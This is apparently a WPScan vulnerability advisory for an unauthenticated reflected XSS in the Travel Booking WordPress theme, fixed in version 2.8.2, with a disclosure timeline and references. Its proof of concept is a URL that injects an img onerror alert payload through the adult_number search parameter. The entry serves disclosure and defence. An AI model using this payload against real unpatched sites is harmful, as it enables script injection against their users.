Travel Booking < 2.8.2 - Unauthenticated Reflected XSS



Description
Unauthenticated Reflected XSS vulnerability was discovered in the «Travel Booking WordPress Theme», tested version — v2.8.1.

Edit (WPScanTeam)
June 17th, 2020 - Confirmed & Escalated to Envato.
June 18th, 2020 - v2.8.2 released, fixing the issue.
Proof of Concept
https://example.com/search-hotel-full-map/?location_name=x&location_id=x&start=&end=&date=16/06/2020 12:00 am-17/06/2020 11:59 pm&room_num_search=x&adult_number="><img src='x' onerror=alert(`XSS`)>&child_number=0&price_range=x&taxonomy[hotel_facilities]=

Affects Theme

fixed in version 2.8.2

References

URL https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
URL https://travelerwp.com/traveler-changelog/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Vlad Vector
Submitter VLΛD VΞCTOR
Submitter Website https://vladvector.ru
Submitter Twitter vlad_vector
Views 621
Verified Yes
WPVDB ID 10276

Timeline

Publicly Published 2020-06-19 (20 days ago)
Added 2020-06-19 (19 days ago)
Last Updated 2020-06-20 (19 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin